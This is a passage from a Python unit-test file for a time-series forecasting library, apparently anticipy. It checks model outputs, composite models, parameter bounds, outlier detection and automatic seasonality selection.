10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_y = 10 * a_x df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y}).head() a_y_result = model_naive(a_x, a_date, None, df_actuals=df_actuals) logger_info('a_y result: ', a_y_result) a_y_expected = np.array( [0., 0., 10, 20., 30., 40, 40., 40., 40., 40., ]) self.assert_array_equal(a_y_result, a_y_expected) # TODO: model composition disabled, check that exception is thrown # # Model composition # a_params = np.array([1.,0.,]) # a_y_result = (model_naive + model_linear) (a_x, a_date, a_params, # df_actuals=df_actuals) # logger_info('a_y result: ', a_y_result) def test_fillna_wday(self): a_x = np.arange(0, 70) a_date = pd.date_range('2014-01-01', periods=70, freq='D') a_y = 1. * a_x a_y_gap = np.where(np.isin(a_x, [5, 10, 15, 20]), np.NaN, a_y) df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y_gap}) time_start = datetime.now() df_result = _fillna_wday(df_actuals) runtime = datetime.now() - time_start logger_info('run time: ', runtime) logger_info('df_actuals:', df_actuals) logger_info('df_result:', df_result) def test_model_snaive_wday(self): logger.info('Test 1 - default settings') a_x = np.arange(0, 21) a_date = pd.date_range('2014-01-01', periods=21, freq='D') a_y = 10. 
* a_x df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y}).head(7) a_y_result = model_snaive_wday( a_x, a_date, None, df_actuals=df_actuals) logger_info('a_y result: ', a_y_result) a_y_expected = np.array( [np.NaN] * 7 + np.arange(0, 70., 10.).tolist() * 2) self.assert_array_equal(a_y_result, a_y_expected) logger.info('Test 2 - null values on last week') df_actuals = pd.DataFrame({'date': a_date, 'x': a_x, 'y': a_y}).head(14) df_actuals.y.iloc[-1] = np.NaN logger_info('actuals: ', df_actuals) a_y_result = model_snaive_wday( a_x, a_date, None, df_actuals=df_actuals) logger_info('a_y result: ', a_y_result) # TODO: model composition disabled, check that exception is thrown # # Model composition # a_params = np.array([1.,0.,]) # a_y_result = (model_naive + model_linear) (a_x, a_date, a_params, # df_actuals=df_actuals) # logger_info('a_y result: ', a_y_result) def test_forecast_model_simple_models(self): # TODO: test all models with is_mult True and False a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') def test_model( name, model, params, a_expected, l_is_mult=None, a_date=a_date, a_x=a_x): if l_is_mult is None: l_is_mult = [True, False] for is_mult in l_is_mult: params = np.array(params) a = model(a_x, a_date, params, is_mult) logger_info('a {}, is_mult={} :'.format(name, is_mult), a) self.assert_array_equal(a, a_expected) # Test init params params = model.f_init_params(None, None, None) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(None, None, None) logger.info('params: %s', params) self.assertTrue(validate_initial_guess(params, bounds)) params = model.f_init_params(a_x, None, a_x) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(a_x, None, a_x) logger.info('a_x: %s', a_x) logger.info('params: %s', params) logger.info('bounds: %s', bounds) self.assertTrue(validate_initial_guess(params, bounds)) params = model.f_init_params(None, a_x, a_date) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(None, a_x, a_x) logger.info('a_x: %s', a_x) logger.info('params: %s', params) logger.info('bounds: %s', bounds) self.assertTrue(validate_initial_guess(params, bounds)) params = model.f_init_params(a_x, a_x, a_date) self.assertIsInstance(params, np.ndarray) bounds = model.f_bounds(a_x, a_x, a_x) logger.info('params: %s', params) self.assertTrue(validate_initial_guess(params, bounds)) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) test_model('constant', model_constant, [42], np.full(10, 42.)) test_model('linear', model_linear, [-1., 10], np.arange(10., 0, -1)) test_model('ramp', model_ramp, [5., 1.], np.concatenate([np.full(5, 0.), np.arange(0, 5.)]), [False]) test_model('ramp', model_ramp, [5., 1.], np.concatenate([np.full(5, 1.), np.arange(1, 6.)]), [True]) test_model('exp', model_exp, [10., 2], np.array( [10., 20., 40., 80., 160., 320., 640., 1280., 2560., 5120.])) test_model('step', model_step, [5., 100.], np.array(5 * [0.] + 5 * [100.]), [False]) test_model('step', model_step, [5., 100.], np.array(5 * [1.] + 5 * [100.]), [True]) test_model('step_date', get_model_step_date('2014-01-06'), [100.], np.array(5 * [0.] + 5 * [100.]), [False]) test_model('step_date', get_model_step_date('2014-01-06'), [100.], np.array(5 * [1.] + 5 * [100.]), [True]) test_model('spike', model_spike, [10., 4., 6.], np.array(4 * [0.] + 2 * [10.] + 4 * [0.]), [False]) test_model('spike', model_spike, [10., 4., 6.], np.array(4 * [1.] + 2 * [10.] 
+ 4 * [1.]), [True]) test_model('decay', model_decay, [10., -1000., 0.], np.array([10.] + 9 * [0.])) test_model( 'spike_date', get_model_spike_date( '2014-01-05', '2014-01-07'), [10.], np.array( 4 * [0.] + 2 * [10.] + 4 * [0.]), [False]) test_model( 'spike_date', get_model_spike_date( '2014-01-05', '2014-01-07'), [10.], np.array( 4 * [1.] + 2 * [10.] + 4 * [1.]), [True]) test_model('2 steps', model_two_steps, [5., 100., 7, 200.], np.array(5 * [0.] + 2 * [100.] + 3 * [300.]), [False]) test_model('2 steps', model_two_steps, [5., 100., 7, 3.], np.array(5 * [1.] + 2 * [100.] + 3 * [300.]), [True]) test_model('season_wday', model_season_wday, 10 * np.arange(1., 7.), np.array([20., 30., 40., 50., 60., 0, 10., 20., 30., 40.]), [False]) test_model('season_wday', model_season_wday, 10 * np.arange(1., 7.), np.array([20., 30., 40., 50., 60., 1, 10., 20., 30., 40.]), [True]) a_x2 = np.arange(0, 12) a_date2 = pd.date_range('2014-01-01', periods=12, freq='D') test_model('season_month', model_season_month, 10 * np.arange(2., 13.), np.array([60., 70., 80., 90., 100, 110., 120., 0., 20., 30., 40., 50., ]), [False], a_date=pd.date_range('2014-06-01', periods=12, freq='M'), a_x=a_x2) test_model('season_month', model_season_month, 10 * np.arange(2., 13.), np.array([60., 70., 80., 90., 100, 110., 120., 1., 20., 30., 40., 50., ]), [True], a_date=pd.date_range('2014-06-01', periods=12, freq='M'), a_x=a_x2) test_model('season_fourier_yearly', model_season_month, 10 * np.arange(2., 13.), np.array([60., 70., 80., 90., 100, 110., 120., 1., 20., 30., 40., 50., ]), [True], a_date=pd.date_range('2014-06-01', periods=12, freq='M'), a_x=a_x2) # test fourier model from anticipy.forecast_models import _f_init_params_fourier for is_mult in [False, True]: a_x = 10 * np.arange(2., 13.) a_date = pd.date_range('2014-06-01', periods=10, freq='M') params = _f_init_params_fourier() a = model_season_fourier_yearly(a_x, a_date, params, is_mult) logger_info( 'a {}, is_mult={} :'.format( 'model_season_fourier_yearly', is_mult), a) for is_mult in [False, True]: a_x = 10 * np.arange(2., 13.) a_date = pd.date_range('2014-06-01', periods=10, freq='M') params = np.full(20, 1.) a = model_season_fourier_yearly(a_x, a_date, params, is_mult) logger_info( 'a {}, is_mult={} :'.format( 'model_season_fourier_yearly', is_mult), a) test_model('ukcalendar', model_calendar_uk, [1, 1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.ones(10), l_is_mult=[True]) test_model('ukcalendar', model_calendar_uk, [1, 1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.zeros(10), l_is_mult=[False]) test_model('uscalendar', model_calendar_us, [1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.ones(10), l_is_mult=[True]) test_model('uscalendar', model_calendar_us, [1], # First parameter changes value of New Year array_ones_in_indices(10, 0) + np.zeros(10), l_is_mult=[False]) def test_forecast_model_composite(self): a_x = np.arange(1, 11.) a_y = np.arange(1, 11.) 
a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_date_month = pd.date_range('2014-01-01', periods=10, freq='M') dict_model = { 'constant': model_constant, 'linear': model_linear, 'ramp': model_ramp, 'exp': model_exp, 'season_wday': model_season_wday, # TODO: ADD season_wday_2 'season_month': model_season_month, 'step': model_step, 'two_steps': model_two_steps, } dict_params = { 'constant': np.array([1.]), 'linear': np.array([1., 0.]), 'ramp': np.array([6., 1.]), 'exp': np.array([1., 2.]), 'season_wday': np.arange(1., 7.), 'season_month': np.arange(2., 13.), 'step': np.array([6., 100.]), 'two_steps': np.array([6., 100., 8, 200.]), } dict_expected_add = { 'constant': np.full(10, 1.), 'linear': np.arange(1., 11.), 'ramp': np.concatenate([np.full(5, 0.), np.arange(0, 5.)]), 'exp': 2 ** np.arange(1., 11.), 'season_wday': np.arange(2., 12., ) % 7, 'season_month': np.full(10, 0.), 'step': np.array(5 * [0.] + 5 * [100.]), 'two_steps': np.array(5 * [0.] + 2 * [100.] + 3 * [300.]), } dict_expected_mult = { 'constant': np.full(10, 1.), 'linear': np.arange(1., 11.), 'ramp': np.concatenate([np.full(5, 1.), np.arange(1, 6.)]), 'exp': 2 ** np.arange(1., 11.), 'season_wday': np.array([2., 3., 4., 5., 6., 1., 1., 2., 3., 4., ]), 'season_month': np.full(10, 1.), 'step': np.array(5 * [1.] + 5 * [100.]), 'two_steps': np.array(5 * [1.] + 2 * [100.] + 3 * [20000.]), } def test_model_1(key): model = dict_model[key] initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model %s - name: %s', key, model.name) self.assert_array_equal( model( a_x, a_date, dict_params[key]), dict_expected_add[key]) logger.info('Initial guess: %s', model.f_init_params(a_x, a_y)) self.assertEqual(len(initial_guess), model.n_params) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) for key in dict_model.keys(): test_model_1(key) def test_model_2_add(key1, key2): model = dict_model[key1] + dict_model[key2] initial_guess = model.f_init_params(a_x, a_y) logger.info( 'Testing model %s, %s - name: %s', key1, key2, model.name) logger.info( 'Parameters: %s , %s', dict_params[key1], dict_params[key2]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) model_output = model(a_x, a_date, np.concatenate( [dict_params[key1], dict_params[key2]])) logger.info('Model output: %s', model_output) self.assert_array_equal( model_output, dict_expected_add[key1] + dict_expected_add[key2]) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) for key1, key2 in itertools.product( dict_model.keys(), dict_model.keys()): logger.info('Keys: %s , %s', key1, key2) test_model_2_add(key1, key2) def test_model_2_mult(key1, key2): model = dict_model[key1] * dict_model[key2] initial_guess = model.f_init_params(a_x, a_y) logger.info( 'Testing model %s, %s - name: %s', key1, key2, model.name) logger.info( 'Parameters: %s , %s', dict_params[key1], dict_params[key2]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) model_output = model(a_x, a_date, np.concatenate( [dict_params[key1], dict_params[key2]])) logger.info('Model output: %s', model_output) self.assert_array_equal( model_output, dict_expected_mult[key1] * dict_expected_mult[key2]) # Test cache dict_cache_vars = model.init_cache(a_x, a_date) logger.info('cache_vars: %s', dict_cache_vars) for key1, key2 in itertools.product( dict_model.keys(), dict_model.keys()): logger.info('Keys: %s 
, %s', key1, key2) test_model_2_mult(key1, key2) def test_forecast_model_composite_null(self): a_x = np.arange(0, 10.) a_y = np.arange(0, 10.) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_date_month = pd.date_range('2014-01-01', periods=10, freq='M') dict_model = { 'constant': model_constant, 'linear': model_linear, 'exp': model_exp, 'season_wday': model_season_wday, 'season_month': model_season_month, } dict_params = { 'constant': np.array([1.]), 'linear': np.array([1., 0.]), 'exp': np.array([1., 2.]), 'season_wday': np.arange(1., 7.), 'season_month': np.arange(1., 13.) } dict_expected = { 'constant': np.full(10, 1.), 'linear': np.arange(0., 10.), 'exp': 2 ** np.arange(0., 10.), 'season_wday': np.arange(2., 12., ) % 7, 'season_month': np.full(10, 0.), } def test_model_2_add_null(key1): model = dict_model[key1] + model_null initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model %s, - name: %s', key1, model.name) logger.info('Parameters: %s', dict_params[key1]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) self.assert_array_equal(model(a_x, a_date, dict_params[key1]), dict_expected[key1]) for key in dict_model.keys(): test_model_2_add_null(key) def test_model_2_mult_null(key1): model_original = dict_model[key1] model = model_original * model_null initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model %s, - name: %s', key1, model.name) logger.info('Parameters: %s', dict_params[key1]) logger.info('Initial guess: %s', initial_guess) self.assertEqual(model, model_original) for key in dict_model.keys(): test_model_2_mult_null(key) def test_forecast_model_composite_3(self): # Test composition of 3+ models a_x = np.arange(0, 10.) a_y = np.arange(0, 10.) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a_date_month = pd.date_range('2014-01-01', periods=10, freq='M') dict_model = { 'constant': model_constant, 'linear': model_linear, 'ramp': model_ramp, 'exp': model_exp, 'season_wday': model_season_wday, 'season_month': model_season_month, } dict_params = { 'constant': np.array([1.]), 'linear': np.array([1., 0.]), 'ramp': np.array([6., 1.]), 'exp': np.array([1., 2.]), 'season_wday': np.arange(1., 7.), 'season_month': np.arange(1., 13.) 
} dict_expected = { 'constant': np.full(10, 1.), 'linear': np.arange(0., 10.), 'ramp': np.concatenate([np.full(5, 0.), np.arange(0, 5.)]), 'exp': 2 ** np.arange(0., 10.), 'season_wday': # np.arange(2., 12., ) % 7, np.array([2., 3., 4., 5., 6., 1., 1., 2., 3., 4.]), 'season_month': np.full(10, 1.), } def test_model_3(model, params, expected): initial_guess = model.f_init_params(a_x, a_y) logger.info('Testing model: %s', model.name) logger.info('Parameters: %s', params) logger.info('Initial guess: %s', initial_guess) self.assertEqual(len(initial_guess), model.n_params) self.assert_array_equal(model(a_x, a_date, params), expected) test_model_3( (model_linear * model_linear) + model_constant, np.concatenate([dict_params['linear'], dict_params['linear'], dict_params['constant']]), (dict_expected['linear'] * dict_expected['linear']) + dict_expected['constant'] ) test_model_3( model_linear * (model_linear + model_constant), np.concatenate([dict_params['linear'], dict_params['linear'], dict_params['constant']]), dict_expected['linear'] * (dict_expected['linear'] + dict_expected['constant']) ) test_model_3( (model_linear * model_season_wday) + model_constant, np.concatenate([dict_params['linear'], dict_params['season_wday'], dict_params['constant']]), (dict_expected['linear'] * dict_expected['season_wday']) + dict_expected['constant'] ) def test_forecast_model_bounds(self): dict_model = { 'constant': model_constant, 'linear': model_linear, 'exp': model_exp, 'season_wday': model_season_wday, 'season_month': model_season_month, 'step': model_step, 'two_steps': model_two_steps, 'sigmoid_step': model_sigmoid_step, 'ramp': model_ramp } dict_expected = dict() for model_name, model_obj in dict_model.items(): n_params = model_obj.n_params exp = n_params * [-np.inf], n_params * [np.inf] dict_expected[model_name] = exp # Manually set the boundaries here dict_expected['sigmoid_step'] = ( [-np.inf, -np.inf, 0.0], [np.inf, np.inf, np.inf]) def test_model_bounds(key, model, expected): bounds = model.f_bounds() params = model.n_params logger.info('Testing model: %s', model.name) logger.info('Bounds: %s', bounds) logger.info('Expected: %s', expected) self.assertEqual(params, len(bounds[0])) self.assertTupleEqual(bounds, expected) for model_name, model_obj in dict_model.items(): test_model_bounds(model_name, model_obj, dict_expected[model_name]) def test_get_model_outliers(self): # TODO: change input dfs to normalized form, rather than call # normalize_df # Test 1 - no outliers a_y = [20.0, 20.1, 20.2, 20.3, 20.4, 20.5] a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 1a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, np.full(len(a_y), False)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # 1b - with datetime index df = pd.DataFrame({'y': a_y}, index=a_date).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 1b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, np.full(len(a_y), False)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # Test 2 - Single step a_y = np.array([19.8, 19.9, 20.0, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7, 10.8, 10.9]) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) 
logger.info('Model 2a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, 9)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # 2b - with date column df = pd.DataFrame({'y': a_y}, index=a_date).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 2b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, 9)) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # Test 3 - Two step changes a_y = np.array([-1, 0, 1, 2, 3, 5, 6, 8, 10, 15, 16, 18, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 10.1, 10.2, 10.3, 10.4]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 3: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, [9, 18])) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # Test 4 - Consecutive changes a_y = np.array([-1, 0, 1, 2, 3, 5, 6, 8, 15, 16, 21, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 20.7, 20.8, 10., 10.1, 10.2, 10.3, 10.4]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 4: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal( mask_step, array_true_in_indices( a_y.size, [ 8, 9, 10, 19])) self.assert_array_equal(mask_spike, np.full(len(a_y), False)) # spikes # Test 5 - 2 spikes and 1 step a_y = np.array([19.8, 19.9, 30.0, 30.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 30.7, 10.8, 10.9]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 5a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, [9])) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [2, 3, 16])) # 5b - with datetime index a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y}, index=a_date).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 5b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_ones_in_indices(a_y.size, [9])) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [2, 3, 16])) # Test 6a - single spike a_y = np.array([19.8, 19.9, 20.0, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 20.8, 20.9, 21.0, 21.1, 21.2, 21.3, 21.4, 21.5, 21.6]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 6a: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, np.full(len(a_y), False)) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [9])) # Test 6b - single spike co-located with step a_y = np.array([19.8, 19.9, 20.0, 20.1, 20.2, 20.3, 20.4, 20.5, 20.6, 10., 30.7, 30.8, 30.9, 31.0, 31.1, 31.2, 31.3, 31.4, 31.5]) df = pd.DataFrame({'y': a_y}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger.info('Model 6b: Step: %s, Spike: %s ', mask_step, mask_spike) self.assert_array_equal(mask_step, array_true_in_indices(a_y.size, [9, 10])) self.assert_array_equal(mask_spike, array_true_in_indices(a_y.size, [9])) # TODO: Work in progress @unittest.skip('outliers with gap not implemented yet') def test_get_model_outliers_withgap(self): # # Test 1 - short series with null value - nulls cause no outliers a_y = [0., 1., np.NaN, 3., 
4., 5., 6., 7., ] a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger_info('Model 1:', mask_step) self.assertIsNone(mask_step) self.assertIsNone(mask_spike) # Test 1b - series with multiple values per x -- raises ValueError a_y = np.arange(0, 10.) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}) df = pd.concat([df.head(5), df.head(6).tail(2)]).pipe(normalize_df) with self.assertRaises(ValueError): mask_step, mask_spike = get_model_outliers(df) # Test 2 - short series with gap value - no real outliers a_y = np.arange(0, 10.) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}) df = pd.concat([df.head(5), df.tail(-6)]).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger_info('Model 1:', mask_step) self.assertIsNotNone(mask_step) # Incorrectly finds a step self.assertIsNone(mask_spike) # No spikes # Test 2b - after interpolating, can get outliers - finds none df_nogap = df.pipe(interpolate_df, include_mask=True) mask_step, mask_spike = get_model_outliers(df_nogap) logger_info('df 1 - no gap:', df_nogap) self.assertIsNone(mask_step) # No steps self.assertIsNone(mask_spike) # No spikes # # Test 3 - short series with gap value - with outliers a_y = np.arange(0, 10.) a_y2 = np.arange(1, 11.) a_date = pd.date_range(start='2018-01-01', periods=len(a_y), freq='D') df = pd.DataFrame({'y': a_y, 'date': a_date}) df2 = pd.DataFrame({'y': a_y2, 'date': a_date}) df = pd.concat([df.head(5), df2.tail(-6)]).pipe(normalize_df) mask_step, mask_spike = get_model_outliers(df) logger_info('Model 1:', mask_step) self.assertIsNotNone(mask_step) # Incorrectly finds a step self.assertIsNone(mask_spike) # No spikes # Test 3b - after interpolating with interpolate_df() - TODO: REMOVE # THIS df_nogap = df.pipe(interpolate_df, include_mask=True) mask_step, mask_spike = get_model_outliers(df_nogap) df_nogap['mask_step'] = mask_step df_nogap['step_in_filled_gap'] = df_nogap.mask_step * \ df_nogap.is_gap_filled df_nogap['mask_step_patch'] = df_nogap.step_in_filled_gap.shift( -1).fillna(0) df_nogap = df_nogap.loc[~df_nogap.is_gap_filled] df_nogap['mask_step_patch'] = df_nogap.mask_step_patch.shift( 1).fillna(0) df_nogap['mask_step'] = df_nogap.mask_step + df_nogap.mask_step_patch df_nogap = df_nogap[['date', 'x', 'y', 'mask_step']] logger_info('df 1 - no gap:', df_nogap) self.assert_array_equal( df_nogap.mask_step, array_ones_in_indices( df_nogap.index.size, [5])) self.assertIsNone(mask_spike) # No spikes # TODO: we need to # - filter out filled gaps # - get list of steps # - if a step is in a filled gap, move to next sample def test_get_fixed_model(self): logger.info('Test 1 - default settings') a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a1 = model_constant(a_x, a_date, np.array([42])) model_constant_fixed = get_fixed_model(model_constant, np.array([42])) print(model_constant_fixed) a2 = model_constant_fixed(a_x, a_date, None) self.assert_array_equal(a1, a2) logger.info('Test 2 - 0-param model') model_out = get_fixed_model(model_naive, []) self.assertEqual(model_out.name, 'naive') def test_fix_params_fmodel(self): a_x = np.arange(0, 10) a_date = pd.date_range('2014-01-01', periods=10, freq='D') a1 = model_linear(a_x, a_date, np.array([10., -1.])) model_linear_fixed = fix_params_fmodel(model_linear, 
[10., np.NaN]) logger_info('model_linear_fixed:', model_linear_fixed) self.assertEqual(model_linear_fixed.n_params, 1) a2 = model_linear_fixed(a_x, a_date, params=[-1.]) self.assert_array_equal(a1, a2) # TODO: Implement test def test_validate_model_bounds(self): pass def test_get_l_model_auto_season(self): logger.info('Test 0 - Test for series with single sample') a_date = pd.a_date = pd.date_range('2014-01-01', periods=1, freq='D') l_expected = [model_null] l_result = get_l_model_auto_season(a_date) self.assert_array_equal(l_result, l_expected) logger.info('Test 1 - Tests for series with daily samples') # Test 1.1 - not enough samples for weekly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=10, freq='D') l_expected = [model_null] l_result = get_l_model_auto_season(a_date) self.assert_array_equal(l_result, l_expected) # Test 1.2 - enough samples for weekly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=12, freq='D') l_expected = [model_null, model_season_wday] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 1.2b - l_season_yearly is empty list l_result = get_l_model_auto_season( a_date, l_season_yearly=[], min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 1.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=549, freq='D') l_expected = sorted([model_null, model_season_wday * model_season_fourier_yearly, model_season_wday, model_season_fourier_yearly]) l_result = get_l_model_auto_season( a_date, min_periods=1.5, season_add_mult='mult') self.assert_array_equal(l_result, l_expected) l_expected = [ model_null, model_season_wday + model_season_fourier_yearly, model_season_wday, model_season_fourier_yearly] l_expected.sort() l_result = get_l_model_auto_season( a_date, min_periods=1.5, season_add_mult='add') self.assert_array_equal(l_result, l_expected) # Test 1.3b - Weekly and yearly seasonality, empty l_season_yearly l_result = get_l_model_auto_season( a_date, l_season_yearly=[], min_periods=1.5, season_add_mult='add') l_expected = [model_null, model_season_wday] self.assert_array_equal(l_result, l_expected) # Test 1.3c - Weekly and yearly seasonality, empty l_season_weekly l_result = get_l_model_auto_season( a_date, l_season_weekly=[], min_periods=1.5, season_add_mult='add') l_expected = [model_null, model_season_fourier_yearly] self.assert_array_equal(l_result, l_expected) logger.info('Test 2 - Tests for series with weekly samples') # Test 2.2 - not enough samples for yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=12, freq='W') l_expected = [model_null] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 2.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=80, freq='W') l_expected = [model_null, model_season_fourier_yearly] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) logger.info('Test 3 - Tests for series with monthly samples') # Test 3.2 - not enough samples for yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=12, freq='M') l_expected = [model_null] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 3.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=20, freq='M') l_expected = [model_null, 
model_season_fourier_yearly] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) logger.info('Test 4 - Tests for series with quarterly samples') # Test 4.2 - not enough samples for yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=5, freq='Q') l_expected = [model_null] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) # Test 4.3 - Weekly and yearly seasonality a_date = pd.a_date = pd.date_range('2014-01-01', periods=7, freq='Q') l_expected = [model_null, model_season_fourier_yearly] l_result = get_l_model_auto_season(a_date, min_periods=1.5) self.assert_array_equal(l_result, l_expected) def test_simplify_model(self): # Test 1: normal bounds model_dummy = Namespace() model_dummy.f_bounds = lambda a_x, a_y, a_date: ( np.array([3.]), np.array([7.])) model_dummy.n_params = 1 model_dummy.name = 'dummy' model_result = simplify_model(model_dummy) logger_info('model_dummy', model_dummy) logger_info('result:', model_result) self.assertEqual(model_dummy, model_result) # Test 2: min and max bounds match - model transformed into fixed model model_dummy = Namespace() model_dummy.f_bounds = lambda a_x, a_y, a_date: ( np.array([5.]), np.array([5.])) model_dummy.n_params = 1 model_dummy.name = 'dummy' model_result = simplify_model(model_dummy) logger_info('model_dummy', model_dummy) logger_info('result:', model_result) self.assertEqual(model_result.n_params, 0) def test_validate_initial_guess(self): result = validate_initial_guess( np.array([5., 5.]), (np.array([0., 0.]), np.array([10., 10.]))) self.assertTrue(result) result = validate_initial_guess( np.array([0., 10.]), (np.array([0., 0.]), np.array([10., 10.]))) self.assertTrue(result) result = validate_initial_guess( np.array([-1., 11.]), (np.array([0., 0.]), np.array([10., 10.]))) self.assertFalse(result) def test_validate_input(self): # Test1: default f_validate_input model1 = ForecastModel('model1', 0, forecast_models._f_model_null, l_f_validate_input=None) model2 = ForecastModel( 'model2', 0, forecast_models._f_model_null, l_f_validate_input=forecast_models._f_validate_input_default) model3 = ForecastModel( 'model3', 0, forecast_models._f_model_null, l_f_validate_input=[ forecast_models._f_validate_input_default]) l_expected = [forecast_models._f_validate_input_default] self.assertListEqual(model1.l_f_validate_input, l_expected) self.assertListEqual(model2.l_f_validate_input, l_expected) self.assertListEqual(model3.l_f_validate_input, l_expected) # Check composition self.assertListEqual( (model1 + model2 + model3).l_f_validate_input, l_expected) self.assertListEqual( (model1 * model2 * model3).l_f_validate_input, l_expected) # Test2 : test non-default input functions def f1(a_x, a_y, a_date): assert False model4 = ForecastModel('model3', 0, forecast_models._f_model_null, l_f_validate_input=[f1]) self.assertListEqual(model4.l_f_validate_input, [f1]) # Check composition l_expected = [forecast_models._f_validate_input_default, f1] l_result1 = (model1 + model4).l_f_validate_input l_result2 = (model1 * model4).l_f_validate_input def assert_list_func_equal(l_result, l_expected): # can't sort lists of functions, so we need to brute force the # equality test self.assertEqual(len(l_result), len(l_expected)) for result in l_result: self.assertIn(result, l_expected) assert_list_func_equal(l_result1, l_expected) assert_list_func_equal(l_result2, l_expected) # Test3: model.validate_input() 
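# A minimal sketch of the semantics Test 3 below exercises (my assumption, not the
# actual forecast_models implementation): a composed model is expected to pass
# validate_input() only if every function in l_f_validate_input accepts the series,
# and to fail when any validator returns False or raises -- e.g. f1 above, which
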